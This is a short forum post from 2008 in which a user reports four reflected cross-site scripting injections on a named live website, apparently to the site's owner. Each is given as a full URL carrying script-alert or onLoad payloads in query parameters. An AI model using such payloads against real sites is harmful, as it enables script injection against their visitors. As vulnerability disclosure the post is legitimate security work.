Показать сообщение отдельно

  #2  
Старый 28.03.2008, 19:26
LAEOT
Новичок
Регистрация: 06.01.2008
Сообщений: 15
Провел на форуме:
29345

Репутация: 35
По умолчанию

Hello Truelamer,
Sorry that I speak only in English (Russian language is not yet installed on my pc ).
1. I found a XSS:
http://gena.x53.ru/cabinet.php?about_us=1'="><script>alert(/XSS-BY-LAEOT/)</script>
# it's on all pages! (....(something)="Here we place our bad code)).
2. Another XSS:
http://gena.x53.ru/cabinet.php?org_full=60="><script>alert(/XSS-BY-LAEOT/)</script>&active=1
3. XSS :
http://gena.x53.ru/index.php?cid=1'="><script>alert(/XSS-BY-LAEOT/)</script>&aid=1'&archive=1'
4.XSS:
http://gena.x53.ru/index.php?error=="><body onLoad=alert(/XSS-BY-LAEOT/)>
-------------------------------------------------
That's all what i've found.
And your login account doesn't work
But ok.. good luck with your site!

LAEOT
 
Ответить с цитированием